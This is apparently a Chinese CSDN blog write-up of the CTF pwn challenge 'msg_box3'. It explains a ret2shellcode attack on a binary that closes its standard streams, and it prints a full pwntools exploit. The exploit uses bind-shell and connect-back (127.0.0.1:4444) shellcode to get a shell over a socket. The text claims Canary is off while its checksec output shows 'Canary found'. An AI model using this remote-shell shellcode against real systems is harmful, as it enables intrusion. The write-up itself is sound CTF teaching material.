[socket 弹 shell] msg_box3

已于 2023-11-28 00:09:01 修改
阅读量93 收藏
点赞数
分类专栏: # 每日一“胖“ 文章标签: pwn
于 2023-11-28 00:06:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134657482
版权

前言

题目比较简单,没开 Canary 和 NX.

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

漏洞利用与分析:

白给的函数调用,其中 ptr + 10 是用户可控的,而 NX 又没开,所以 ret2shellcode

主要的考点就是其在执行 shellcode 之前,把 stdin/stdout/stderr 全给关了。但是这里题目并没有开沙箱,所以直接利用 socket 进行通信拿 shell。

exp 如下:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

io = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'Enter your choice: '

sla(menu, b'1')
sla(b'):\n', b'XiaozaYa')
def exp1():
        port = 5555
        shellcode = asm(shellcraft.bindsh(port, 'ipv4'))
        sla(b'):\n', shellcode)

        sla(menu, b'3')
        x = remote('127.0.0.1', port)
        x.interactive()

def exp2():
        port = 4444
        x = listen(port)
        shellcode = asm(shellcraft.connect('127.0.0.1', port) + shellcraft.dupsh())
        sla(b'):\n', shellcode)
        sla(menu, b'3')
        x.interactive()

#shellcode = asm(shellcraft.findpeersh(io.lport))
#sla(b'):\n', shellcode)
#sla(menu, b'3')
#sh()

if __name__ == '__main__':
        exp1()
        #exp2()

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界pwn入门题(一)
qq_43774856的博客
12-23 790
get_shell 直接连接目标主机,输入ls /,cat flag就得到flag when_did_you_born 先检查一下文件的基本信息 发现是64位可执行文件,并且没有PIE保护 运行一下文件 拖进ida看看 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [r
浅析栈保护机制
najdhdfh的博客
11-11 3372
栈保护机制 canary canary意为金丝雀,作为栈保护技术之一,它的名字源自于17世纪,英国煤矿工人发现金丝雀对瓦斯十分敏感,每次下井都会带一只金丝雀作为“瓦斯检测指标”,从而挽救了很多工人的生命。 canary机制的原理很简单,就是在函数被调用之后,立即在栈帧中插入一个随机数,函数执行完在返回之前,程序通过检查这个随机数是否改变来判断是否存在栈溢出。如图所示,如果buf数据覆盖了目标地址(红色)处的数据,那canary(黄棕色)处的数据也会改变。 canary机制的绕过 要绕过canary也很简单
Linux|elf文件保护机制的含义
Kni9hT's Blog
03-15 639
ubuntu中使用checksec命令可以查看可执行文件开启的保护 调试必不可少的一步操作 但是经常会忘了缩写对应的意思,今天就总结一下。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢出的方法覆盖栈中返回地址,而要通过改写指针与局部变量、...
Pwn入坑指南
子曰小玖的博客
01-17 1553
栈溢出原理 参考我之前发的一篇Windows栈溢出原理 还有brant师傅的《0day安全笔记》 解题过程 逆向和分析 这个过程就是IDA的使用和汇编代码的理解 IDA使用技巧: https://xz.aliyun.com/t/4205 getshell分两种情况: (1) 内存程序中有getshell函数[system("/bin/sh")]或指令时,直接调用/劫持。...
2017 rctf RNote2 writeup
jmp esp
05-23 1260
QIRA我们在写一些exploit的时候,经常会碰见出现的内存不如预期的情况,这个时候我们就会使用调试器查看到底是什么地方出了问题。这个出错的地方肯定是比现在你查看内存的地方要晚了,也就是说,我们得,倒回去看内存,这在一般的调试器中是实现不了的。qira就是这么一个调试器,它可以做到记录下整个过程,使得调试的过程变得更加简单。总的来说,qira的作用: 1. 进行正常调试 2. 调试时如果发现内
Berkeley socket 套接字编程详解
paul123456789io的博客
12-21 2691
6.1 引言 网络程序设计全靠套接字接受和发送信息,尽管套接字这个词好象显得有些神秘,但 其实这个概念极易理解。 这章主要讲述Sockets API(Application Program Interface),以及一些其他的细节(比 如Socket 的历史、数据中的常用结构等),通过这些介绍,使读者慢慢掌握Linux 下的Socket 编程。 6.2 概述 在开始介绍有关编程的知识
wsoshell_realizeru1_socket_shell_
10-04
shell sell s (Suggest new directory)
xml.tar.gz_linux 网关_socket_sqlite3_xml数据库
09-23
从eko网关的9005端口通过socket获取xml数据,存入本地数据库中,涉及xml解析,sqlite3数据库,socket编程等。
socket.rar_lwip Socket_lwip stm32_lwip之socket udp_socketCANstm3
07-15
lwip socket 在stm32上最新实现例子,解决以太网接收慢的问题
socket.rar_socket 交换机_streamokb_交换机
07-15
模拟交换机,实现2台交换机6台主机的交流,具体剑readme
Gobang.rar_socket_socket game_socket游戏_五子棋socket
07-14
一个五子棋小游戏,socket学习案例,可直接使用
Linux 二进制程序保护机制详解
潜心习安全
12-06 1911
0x00 检测 可以使用 pwntools 中的 checksec 工具进行检测,红色表示未开启该保护。   0x01 保护 一、ASLR 1.介绍: ASLR 的是操作系统的功能选项,作用于executable(ELF)装入内存运行时,因而只能随机化 stack、heap、libraries 的基址。 2.表现形式 开启后每次加载程序的 stack、libarys、heap 等地址都会随机化,可...
美国地图json文件,可以使用arcgis转为spacefile
06-24
美国地图json文件,可以使用arcgis转为spacefile
Microsoft Edge 126.0.2592.68 32位离线安装包
06-24
Microsoft Edge 126.0.2592.68 32位离线安装包
FLASH源码:读写FLASH内部数据,读取芯片ID
06-24
STLINK Utility:读取FLASH的软件
.Net 8.0 读写西门子plc和AB plc
06-24
项目包含大部分主流plc和modbus等协议的读写方法。经过本人测试的有西门子和AB所有数据类型的读写(包括 byte short ushort int uint long ulong string bool),开源版本请上gitee搜索IPC.Communication,如需要其他.net版本的包,请留言或下载开源版本自行修改,欢迎提交修改
小程序-家居装修团购小程序
最新发布
06-24
小程序实现的家具装修团购小城,包含了首页、购物车、我的三个模块,可实现建材商城、团购活动、公益验房、线上拼团
C语言课程设计任务书 - 选课系统.docx
06-24
C语言课程设计任务书 - 选课系统.docx
python 报错:socket.setdefaulttimeout(_socket_timeout_)
06-08
这个错误是因为在代码中使用了 `socket.setdefaulttimeout` 方法,但是 `_socket_timeout_` 这个变量没有被定义。你需要在代码中定义这个变量,比如: ``` import socket _socket_timeout_ = 10 socket....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值